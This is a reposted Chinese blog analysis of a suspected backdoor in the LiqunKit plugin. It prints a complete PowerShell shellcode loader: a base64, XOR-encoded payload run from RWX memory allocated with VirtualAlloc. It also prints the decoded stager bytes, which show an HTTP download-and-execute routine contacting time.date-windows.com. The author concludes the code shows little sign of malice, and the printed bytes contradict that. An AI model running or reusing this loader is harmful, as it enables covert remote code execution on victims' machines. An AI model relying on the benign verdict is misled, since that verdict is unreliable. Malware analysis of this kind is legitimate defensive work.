f.close

解压该Gzip:

powershell 解码分析の测试(他们说LiqunKit模块插件有后门?)

获取到文件decoded:

Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDEp5QBUjx9/iM/RfQTsq2sIlbyAsUsdzKnXOKfh0i2AYmS2Aj12vLHf2yS9/4A8GL2TzNAw0E+EoB/4nOckoEJz+zIlIbEOHT+SRbs3bNyN2UEZRDmJERk1XGQNuSkBRTFBMRVcDbXdzA1UDEg0TLikjrhepgZMbF+UJDRwQXLqi4p7f78tuyAXryZs4P2mDoVhhgbs0ry09YC5ZREv3fqM30HrzZeFZ8eFD0azoz56kS203bvSpgqsAld6n1R154+1saO4zJSuyOAwU3xNSVrosBa1u1SiNWeTnsOUPZRyEnDWNRYv3V4uEInXYOf2pXp6pzZMUPU9zNV42Xum1VlthK5ZfwVpLFa77E58AwESkXGFfMI4kXsVWIwciK08CBqENYBbnBauJ2RNQS5FMMmypAsc51l6MXLJ7lLnCWvBS9z/EMyebgxLjXXAHK3FG7W0lUQpjq0KGBbMVlhLkhwP/4YNxWQozvLVV6N4tKMWMoT+YMN+y5PFcguy1MiAjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3FdKTkYNR0JXRg5USk1HTFRQDUBMTiMxF3Vb')

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	IEX $DoIt
}

又见字符串:

38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDEp5QBUjx9/iM/RfQTsq2sIlbyAsUsdzKnXOKfh0i2AYmS2Aj12vLHf2yS9/4A8GL2TzNAw0E+EoB/4nOckoEJz+zIlIbEOHT+SRbs3bNyN2UEZRDmJERk1XGQNuSkBRTFBMRVcDbXdzA1UDEg0TLikjrhepgZMbF+UJDRwQXLqi4p7f78tuyAXryZs4P2mDoVhhgbs0ry09YC5ZREv3fqM30HrzZeFZ8eFD0azoz56kS203bvSpgqsAld6n1R154+1saO4zJSuyOAwU3xNSVrosBa1u1SiNWeTnsOUPZRyEnDWNRYv3V4uEInXYOf2pXp6pzZMUPU9zNV42Xum1VlthK5ZfwVpLFa77E58AwESkXGFfMI4kXsVWIwciK08CBqENYBbnBauJ2RNQS5FMMmypAsc51l6MXLJ7lLnCWvBS9z/EMyebgxLjXXAHK3FG7W0lUQpjq0KGBbMVlhLkhwP/4YNxWQozvLVV6N4tKMWMoT+YMN+y5PFcguy1MiAjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3FdKTkYNR0JXRg5USk1HTFRQDUBMTiMxF3Vb

可在powershell中执行:

[Byte[]]$var_code = [System.Convert]::FromBase64String('38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0qHEzqGEfIvOoY1um41dpIvNzqGs7qHsDIvDAH2qoF6gi9RLcEuOP4uwuIuQbw1bXIF7bGF4HVsF7qHsHIvBFqC9oqHs/IvCoJ6gi86pnBwd4eEJ6eXLcw3t8eagxyKV+S01GVyNLVEpNSndLb1QFJNz2yyMjIyMS3HR0dHR0Sxl1WoTc9sqHIyMjeBLqcnJJIHJyS5giIyNwc0t0qrzl3PZzyq8jIyN4EvFxSyMR46dxcXFwcXNLyHYNGNz2quWg4HNLoxAjI6rDSSdzSTx1S1ZlvaXc9nwS3HR0SdxwdUsOJTtY3Pam4yyn6SIjIxLcptVXJ6rayCpLiebBftz2quJLZgJ9Etz2Etx0SSRydXNLlHTDKNz2nCMMIyMa5FYke3PKWNzc3BLcyrIiIyPK6iIjI8tM3NzcDEp5QBUjx9/iM/RfQTsq2sIlbyAsUsdzKnXOKfh0i2AYmS2Aj12vLHf2yS9/4A8GL2TzNAw0E+EoB/4nOckoEJz+zIlIbEOHT+SRbs3bNyN2UEZRDmJERk1XGQNuSkBRTFBMRVcDbXdzA1UDEg0TLikjrhepgZMbF+UJDRwQXLqi4p7f78tuyAXryZs4P2mDoVhhgbs0ry09YC5ZREv3fqM30HrzZeFZ8eFD0azoz56kS203bvSpgqsAld6n1R154+1saO4zJSuyOAwU3xNSVrosBa1u1SiNWeTnsOUPZRyEnDWNRYv3V4uEInXYOf2pXp6pzZMUPU9zNV42Xum1VlthK5ZfwVpLFa77E58AwESkXGFfMI4kXsVWIwciK08CBqENYBbnBauJ2RNQS5FMMmypAsc51l6MXLJ7lLnCWvBS9z/EMyebgxLjXXAHK3FG7W0lUQpjq0KGBbMVlhLkhwP/4YNxWQozvLVV6N4tKMWMoT+YMN+y5PFcguy1MiAjS9OWgXXc9kljSyMzIyNLIyNjI3RLe4dwxtz2sJojIyMjIvpycKrEdEsjAyMjcHVLMbWqwdz2puNX5agkIuCm41bGe+DLqt7c3FdKTkYNR0JXRg5USk1HTFRQDUBMTiMxF3Vb')
powershell 解码分析の测试(他们说LiqunKit模块插件有后门?) 
for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

 

异或后:

powershell 解码分析の测试(他们说LiqunKit模块插件有后门?)

将数字16进制转换:

content = "252 232 137 0 0 0 96 137 229 49 210 100 139 82 48 139 82 12 139 82 20 139 114 40 15 183 74 38 49 255 49 192 172 60 97 124 2 44 32 193 207 13 1 199 226 240 82 87 139 82 16 139 66 60 1 208 139 64 120 133 192 116 74 1 208 80 139 72 24 139 88 32 1 211 227 60 73 139 52 139 1 214 49 255 49 192 172 193 207 13 1 199 56 224 117 244 3 125 248 59 125 36 117 226 88 139 88 36 1 211 102 139 12 75 139 88 28 1 211 139 4 139 1 208 137 68 36 36 91 91 97 89 90 81 255 224 88 95 90 139 18 235 134 93 104 110 101 116 0 104 119 105 110 105 84 104 76 119 38 7 255 213 232 0 0 0 0 49 255 87 87 87 87 87 104 58 86 121 167 255 213 233 164 0 0 0 91 49 201 81 81 106 3 81 81 104 187 1 0 0 83 80 104 87 137 159 198 255 213 80 233 140 0 0 0 91 49 210 82 104 0 50 192 132 82 82 82 83 82 80 104 235 85 46 59 255 213 137 198 131 195 80 104 128 51 0 0 137 224 106 4 80 106 31 86 104 117 70 158 134 255 213 95 49 255 87 87 106 255 83 86 104 45 6 24 123 255 213 133 192 15 132 202 1 0 0 49 255 133 246 116 4 137 249 235 9 104 170 197 226 93 255 213 137 193 104 69 33 94 49 255 213 49 255 87 106 7 81 86 80 104 183 87 224 11 255 213 191 0 47 0 0 57 199 117 7 88 80 233 123 255 255 255 49 255 233 145 1 0 0 233 201 1 0 0 232 111 255 255 255 47 105 90 99 54 0 228 252 193 16 215 124 98 24 9 249 225 6 76 3 15 113 228 80 9 86 237 10 219 87 168 67 59 186 14 163 172 126 140 15 84 213 234 12 92 195 44 37 12 71 208 23 47 23 48 194 11 36 221 4 26 234 11 51 191 221 239 170 107 79 96 164 108 199 178 77 238 248 20 0 85 115 101 114 45 65 103 101 110 116 58 32 77 105 99 114 111 115 111 102 116 32 78 84 80 32 118 32 49 46 48 13 10 0 141 52 138 162 176 56 52 198 42 46 63 51 127 153 129 193 189 252 204 232 77 235 38 200 234 184 27 28 74 160 130 123 66 162 152 23 140 14 30 67 13 122 103 104 212 93 128 20 243 89 208 70 194 122 210 194 96 242 143 203 236 189 135 104 78 20 77 215 138 161 136 35 182 253 132 246 62 90 192 206 79 75 205 16 6 8 145 27 47 55 252 48 113 117 153 15 38 142 77 246 11 174 122 199 196 147 198 44 70 63 167 191 22 174 102 168 212 116 168 167 1 86 251 26 222 138 125 189 138 238 176 55 30 108 80 22 125 21 125 202 150 117 120 66 8 181 124 226 121 104 54 141 216 48 188 35 227 103 135 127 66 124 19 173 7 125 230 117 0 36 1 8 108 33 37 130 46 67 53 196 38 136 170 250 48 115 104 178 111 17 79 138 33 228 26 245 125 175 127 145 88 183 154 225 121 211 113 212 28 231 16 4 184 160 49 192 126 83 36 8 82 101 206 78 6 114 41 64 136 97 165 38 144 54 181 49 199 164 32 220 194 160 82 122 41 16 159 150 118 203 253 14 11 230 175 130 28 187 19 252 145 199 210 127 161 207 150 17 3 0 104 240 181 162 86 255 213 106 64 104 0 16 0 0 104 0 0 64 0 87 104 88 164 83 229 255 213 147 185 0 0 0 0 1 217 81 83 137 231 87 104 0 32 0 0 83 86 104 18 150 137 226 255 213 133 192 116 198 139 7 1 195 133 192 117 229 88 195 232 137 253 255 255 116 105 109 101 46 100 97 116 101 45 119 105 110 100 111 119 115 46 99 111 109 0 18 52 86 120"


hex_arrays = content.split(' ')
# hex_bytes = bytes.fromhex(content)
print(hex_arrays)
pe_list = []
# int_arrs = list(map(int, hex_arrays))
for hex_array in range(len(hex_arrays)):
    int_array = '0x%02x' % (int(hex_arrays[hex_array], 10))
    pe_list.append(int_array)


pe_str = "".join(pe_list).replace("0x", "")
content = binascii.a2b_hex(pe_str)
with open("ps_shellcode", 'wb') as pe_file:
    pe_file.write(content)

生成shellcode:

powershell 解码分析の测试(他们说LiqunKit模块插件有后门?) powershell 解码分析の测试(他们说LiqunKit模块插件有后门?)

在使用恶意代码分析利器scdbg.exe进行分析,虽然看不太懂,不过依样画葫芦,感觉未有啥恶意痕迹:

powershell 解码分析の测试(他们说LiqunKit模块插件有后门?) powershell 解码分析の测试(他们说LiqunKit模块插件有后门?)

静态分析:

powershell 解码分析の测试(他们说LiqunKit模块插件有后门?)

涉及到的域名date-windows.com目前并未注册:

powershell 解码分析の测试(他们说LiqunKit模块插件有后门?)

 

一乐:

powershell 解码分析の测试(他们说LiqunKit模块插件有后门?) powershell 解码分析の测试(他们说LiqunKit模块插件有后门?)

 

powershell 解码分析の测试(他们说LiqunKit模块插件有后门?)

 

拓展阅读(点评/知识):

参考:

https://www.anquanke.com/post/id/87039

https://www.freebuf.com/articles/system/181697.html

https://www.freebuf.com/news/topnews/245220.html

https://www.cnblogs.com/ring-lcy/p/12794017.html

原文始发于微信公众号(PeiQi文库):powershell 解码分析の测试(他们说LiqunKit模块插件有后门?)

版权声明:admin 发表于 2021年11月30日 上午6:43。
转载请注明:powershell 解码分析の测试(他们说LiqunKit模块插件有后门?) | CTF导航

相关文章

绕过AV进行UserAdd的方法总结及实现
admin
61
揭秘滴滴安全DSRC榜首白帽黑客“土夫子”
admin
115
pyLoad 远程代码执行漏洞分析及复现
admin
504
如何打造一个网络扫描分析平台 – Part II
admin
577
Python 内存马分析
admin
1,097
针对会计人员的诈骗【防范诈骗】
admin
174

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...

相关文章

EvilGophish’s Approach to Advanced Bot Detection with Cloudflare Turnstile
0
CreateRCE — Yet Another Vulnerability in CreateUri
0
BGPWatch — BGP路由分析和诊断平台
0
进程命令行参数欺骗
0
内容劫持 | Electron 安全
0
凭据获取之浏览器
0
实战环境中的Redis 延时注入
0
每日安全动态推送(4-18)
0
漏洞挖掘 | DreamerCMS RCE (CVE-2024-3311)
0
Weblogic RCE(CVE-2024-21006)
0